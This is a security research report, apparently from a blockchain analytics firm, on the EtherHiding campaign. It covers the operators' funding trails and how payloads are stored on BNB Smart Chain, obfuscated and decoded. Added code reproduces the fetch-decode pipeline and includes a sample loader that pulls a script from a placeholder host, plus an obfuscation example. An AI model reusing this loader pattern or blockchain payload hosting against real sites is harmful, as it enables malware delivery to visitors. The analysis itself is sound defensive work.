October 18, 2023

Following the Money on EtherHiding Hacks

The recent upswing in attacks on Web3 projects has pushed industry participants to harden their systems against any exploitable weakness. At the same time, attackers keep coming up with novel ways to target Web3 users through methods that are difficult to investigate and stop.

One such recent method is called EtherHiding, in which attackers use compromised WordPress websites to prompt unsuspecting visitors to download fake browser updates that contain malware, exposing their data in the process.

In an EtherHiding attack, a script injected into the compromised WordPress site retrieves a partial payload (malicious code) from a contract on BNB Smart Chain. The blockchain thus serves as a free hosting platform for a payload that keeps working on its own once deployed. It also lets the operators change the code frequently and switch between attack variants, fake browser-update prompts among them: every change is simply a new transaction to the contract that overwrites the stored payload.

EtherHiding, which was revealed in an article by security firm Guardio Labs and subsequently reported by Cointelegraph, is one example of the many, increasingly sophisticated methods through which attackers try to obtain user data via malware hidden behind seemingly legitimate browser-update prompts. The method exploits lax security on WordPress websites and a new use case for BNB Smart Chain: as an unwitting, reliable and effectively unblockable payload host. Unlike a Web2 hosting account, the contract cannot be suspended by a provider, and reading it through an RPC call leaves no trace on chain.

In this report, the 0xScope team presents more details about how the EtherHiding operators work, including how they deploy the malicious code and, more crucially, how they fund the deployment of payloads on BNB Smart Chain contracts.

EtherHiding Money Trail


Using Scopescan's Money Flow feature, the 0xScope team was able to spot connections between addresses that are involved in EtherHiding attacks.

On the BNB Smart Chain side, we observed that 0xfc1f, a contract deployer address for EtherHiding and an OpenSea user, received 0.0295488 $BNB in gas funds from fellow OpenSea user 0x3e31 on June 29, 2022. The next day, 0xfc1f sent 0.5 $BNB to 0xa136, an address with a history of multiple transactions with 0x3e31.

Other addresses connected to 0x3e31 are 0x688c, which sent 0.03 $BNB in gas funds on June 1, 2022, and 0x8fcb, which sent 69 $BNB to 0x688c on May 10, 2022.

Fast forward to September 5, 2023, EtherHiding contract deployer address 0xfc1f created an EtherHiding contract 0x7f36. This establishes the funding connections between the wallets we mentioned above and the EtherHiding attacks. However, little else is known about the identities of the entities using these wallets, aside from the fact that 0xfc1f and 0x3e31 are OpenSea users.

The 0xScope team then continued its investigation into EtherHiding, this time on the Ethereum blockchain. On June 29, 2022, the same day that 0xfc1f received BNB gas funds, this EtherHiding contract deployer address also received 0.45 $ETH in gas funds from 0xcBAa, which had previously received 0.125 $ETH from 0x423f. The deployer address then had eight transactions with 0x9eba, establishing a relation between the two addresses at a 90% certainty level, according to Scopescan data.

0x9eba also deposited 2.48 $USDT to the deposit address (0xd336) of institutional crypto asset custody service Copper on October 20, 2022. On the same day, 0xB7a2 sent 0.0058 $ETH in gas funds to 0xd336. The 0xScope team thinks this connection to Copper should provide a lead for any further investigation into EtherHiding.

Aside from the money flows established across the two chains, the 0xScope team also noticed multiple transactions between 0x3e31 and 0xa136 on BNB Smart Chain and between 0xfc1f and 0x9eba on Ethereum. There is a reasonable likelihood that these transactions are tied to occasions when the EtherHiding operators updated the malicious code on BNB Smart Chain.

Insights into EtherHiding Operations

In addition to following the money, the 0xScope team also looked at the operators' code. In the Guardio Labs report, its researchers found that the function get() on the EtherHiding BNB Smart Chain contract can be used to fetch the payload. Upon further investigation, we found that the function link() returns the same payload. Both findings are easy to verify by decompiling the contract's bytecode or by calling the functions from a framework like Foundry.

We also found the following insights into EtherHiding's actions, which can be broken down into three stages:

Stage 1

In the first update to the contract, the payload was just the plain text "test". The operators likely did not rehearse on a testnet, which makes it harder for investigators to observe how the code evolved at this stage.

Stage 2

At this stage, the operators encoded the payload in Base64. After decoding it, we found that the malicious code is written in JavaScript. This code in turn requests the next payload from Web2 domains, 18 of which we have identified as EtherHiding sites, giving the operators several options for changing their attacks daily, sometimes even twice a day.

Here's a quick breakdown of how the malicious domains are used:

1. A hacked website contains malicious code (a script) that reads the payload from the BNB Smart Chain contract.

2. The script decodes the payload it fetched from the blockchain (a Base64 layer over the JavaScript).

3. The script executes the decoded payload, which downloads the final payload from one of the operators' hosting websites.

Stage 3

The payload contents in the BNB Smart Chain contract are first obfuscated with a tool like Obfuscator.io and then encoded in Base64. Obscuring the code lets the operators run their attacks with an extra layer of protection against detection. Add the fact that the partial payloads on BNB Smart Chain are updated daily, and the sophistication of the attacks becomes clear.

To understand what this obfuscation hides, consider how a pop-up message is launched in a browser. A single line of JavaScript, alert('1') in this example, makes the browser display a message box. To try it, open any website, press F12, select the Console tab and enter alert('1').

With an obfuscator tool, that same alert('1') can be buried in lines of code that make little sense at first glance: typically the string "alert" and its argument are moved into a string array and reached through generated accessor functions, so neither appears literally in the source.

Combine that with the processes undertaken in the previous stages, and you have a system in which pop-up messages, some looking like legitimate prompts, bait unsuspecting Internet users to download a fake browser update that contains malware.
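As an added illustration (hand-written for this page in the style of Obfuscator.io's string-array transformation; it is not the tool's output and not the operators' code), the snippet below shows alert('1') rewritten so that neither "alert" nor "1" appears literally, checks that it still pops the same alert, and applies a small heuristic a defender could run over a decoded payload to flag that style. The alert function is injected as a parameter so the sample runs under Node.js, where there is no window.alert; the identifier names and the scoring threshold are arbitrary choices.

```javascript
// Added example: an obfuscator.io-style rewrite of alert('1') and a heuristic
// that flags it. Hand-written imitation, not tool output or attacker code.

const PLAIN = `alert('1');`;

// The call target and its argument live in a string array that is rotated at
// load time and read through a hex-named accessor, so a grep for "alert" or
// "'1'" finds nothing. '\x61\x6c\x65\x72\x74' is "alert", '\x31' is "1".
const OBFUSCATED = `
var _0x3f1a=['\\x31','\\x61\\x6c\\x65\\x72\\x74'];
(function(_0x2b,_0x4c){var _0x1d=function(_0x5e){while(--_0x5e){_0x2b['push'](_0x2b['shift']());}};_0x1d(++_0x4c);}(_0x3f1a,0x1));
var _0x5d0c=function(_0x2b,_0x4c){_0x2b=_0x2b-0x0;return _0x3f1a[_0x2b];};
window[_0x5d0c('0x0')](_0x5d0c('0x1'));
`;

// Run a snippet with a fake window/alert and record what it tried to display.
function run(code) {
  const calls = [];
  const fakeWindow = { alert: (msg) => calls.push(String(msg)) };
  new Function("window", "alert", code)(fakeWindow, fakeWindow.alert);
  return calls;
}

// Undo the hex escapes so the string array's contents become readable.
function unescapeHex(code) {
  return code.replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Heuristic for the obfuscator.io string-array style: hex-named identifiers,
// hex-escaped string literals and the push/shift rotation loop. The weights and
// the threshold of 5 are arbitrary, chosen so plain code scores 0.
function obfuscationScore(code) {
  const hexIdents = (code.match(/\b_0x[0-9a-f]+\b/gi) || []).length;
  const hexEscapes = (code.match(/\\x[0-9a-f]{2}/gi) || []).length;
  const rotator = /\['push'\]\(\w+\['shift'\]\(\)\)/.test(code) ? 1 : 0;
  const score = hexIdents + hexEscapes + 5 * rotator;
  return { hexIdents, hexEscapes, rotator, score, suspicious: score >= 5 };
}
```

Both snippets produce the same single alert with the text "1"; only the obfuscated one trips the heuristic, and unescapeHex() on it exposes the string array as ['1','alert'].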

Here's a step-by-step process of how we uncovered more details about the EtherHiding scheme:

- Every day, the EtherHiding operators update the payload in their BNB Smart Chain contract. In one instance, on September 20, they updated the code twice.

- Looking into one of these updates, we see how the payloads are changed by ordinary blockchain transactions: the new payload travels in the input data of a transaction to the contract.

- Decoding that transaction data reveals a string encoded in Base64.

- Decoding the string in turn reveals what the obfuscated code does. In the decoded text, the code was intended to show a pop-up that leads users to one of the compromised URLs, completing the malware distribution process.
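To make the three-step breakdown above and the transaction decoding just listed concrete, here is an added example (not code from the 0xScope report, Guardio Labs or the EtherHiding operators) that reproduces the pipeline offline in Node.js: building the eth_call request the injected script sends to read get(), decoding the ABI-encoded string the contract returns, unwrapping the Base64 layer, pulling out the Web2 hosts the decoded JavaScript contacts, and decoding the input data of a payload-update transaction the same way. The zero contract address, the setter selector 0xdeadbeef, the sample loader script and the domain update-host.example are constructed placeholders; only the get() selector 0x6d4ce63c is real (the first four bytes of keccak256("get()")). link()'s selector is derived the same way with a keccak library, which is not included here.

```javascript
// Added example: reproducing the EtherHiding fetch-and-decode pipeline offline.
// Not code from the 0xScope report, Guardio Labs or the attackers. The contract
// address, setter selector, loader script and domain are constructed placeholders.

// Selector of get(): first four bytes of keccak256("get()"). The selector of
// link() is derived the same way with a keccak library (not included here).
const GET_SELECTOR = "0x6d4ce63c";

// The JSON-RPC request the injected script sends to a BSC node. eth_call is a
// read: no gas, no transaction, and nothing is recorded on chain.
function buildEthCall(contract, selector = GET_SELECTOR) {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contract, data: selector }, "latest"],
  };
}

// ABI-encode one dynamic `string`: offset word, length word, then the bytes
// right-padded to a 32-byte boundary. Used here only to build the samples.
function abiEncodeString(s) {
  const bytes = Buffer.from(s, "utf8");
  const word = (n) => n.toString(16).padStart(64, "0");
  const paddedLen = Math.ceil(bytes.length / 32) * 64;
  return word(32) + word(bytes.length) + bytes.toString("hex").padEnd(paddedLen, "0");
}

// Decode one ABI-encoded `string` from an eth_call result, or from calldata
// once the four-byte function selector has been stripped.
function decodeAbiString(hex) {
  const h = hex.startsWith("0x") ? hex.slice(2) : hex;
  const offset = parseInt(h.slice(0, 64), 16) * 2;              // byte offset -> hex chars
  const length = parseInt(h.slice(offset, offset + 64), 16) * 2; // byte length -> hex chars
  return Buffer.from(h.slice(offset + 64, offset + 64 + length), "hex").toString("utf8");
}

// Stage 2 and 3 payloads are Base64 text; stage 1 was the bare string "test".
// Accept the Base64 reading only if it yields printable ASCII, otherwise
// return the stored string unchanged.
function unwrapPayload(stored) {
  if (/^[A-Za-z0-9+/]+={0,2}$/.test(stored)) {
    const decoded = Buffer.from(stored, "base64").toString("utf8");
    if (/^[\x09\x0a\x0d\x20-\x7e]*$/.test(decoded)) return decoded;
  }
  return stored;
}

// Hosts the decoded JavaScript reaches out to: the Web2 sites that serve the
// final payload and that a defender can block or sinkhole.
function extractDomains(js) {
  const hosts = new Set();
  for (const m of js.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// A payload update is an ordinary transaction to the contract: four-byte setter
// selector, then the new string in the same ABI layout as the read result.
function decodeUpdateCalldata(calldata) {
  const h = calldata.startsWith("0x") ? calldata.slice(2) : calldata;
  return { selector: "0x" + h.slice(0, 8), payload: unwrapPayload(decodeAbiString(h.slice(8))) };
}

// Constructed samples: a stage-2 style loader that pulls the next stage from a
// Web2 host, as the contract would return it and as an update tx would carry it.
const SAMPLE_JS =
  'var s=document.createElement("script");s.src="https://update-host.example/u.js";document.head.appendChild(s);';
const SAMPLE_STORED = Buffer.from(SAMPLE_JS, "utf8").toString("base64");
const SAMPLE_RESULT = "0x" + abiEncodeString(SAMPLE_STORED);           // eth_call result
const SAMPLE_CALLDATA = "0xdeadbeef" + abiEncodeString(SAMPLE_STORED); // deadbeef = placeholder setter selector

function demo() {
  const fromCall = unwrapPayload(decodeAbiString(SAMPLE_RESULT));
  return {
    request: buildEthCall("0x0000000000000000000000000000000000000000"),
    fromCall,
    fromTx: decodeUpdateCalldata(SAMPLE_CALLDATA),
    domains: extractDomains(fromCall),
  };
}
```

The asymmetry matters for investigators: victims' browsers read the contract with eth_call, which is free and never appears on chain, while each payload update is a paid transaction. The contract's transaction history is therefore the complete, timestamped record of every payload version, which is what makes the daily updates and the September 20 double update observable at all.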


Given the information revealed in this report, the 0xScope team recommends the following action points:

- BNB Smart Chain, and other blockchains for that matter, would benefit from security measures that prevent or mitigate this type of abuse. There is no contract-level fix, since storing and reading arbitrary strings is legitimate behaviour, but RPC providers and block explorers can flag contracts whose stored strings decode to executable script, and by studying how smart contracts are made to interact with systems outside Web3, blockchain developers can identify further points of abuse.

- The 0xScope money-flow probe found that the operators likely interacted with Copper addresses. This point of contact is a lead that can be pursued by anyone interested in taking down the EtherHiding scheme.

- This report also highlights the value of Web3 money flow tools like Scopescan in detecting the connections between the addresses that hackers are likely associated with. Scopescan's tools give investigators an added advantage in detecting and stopping hackers in their tracks.
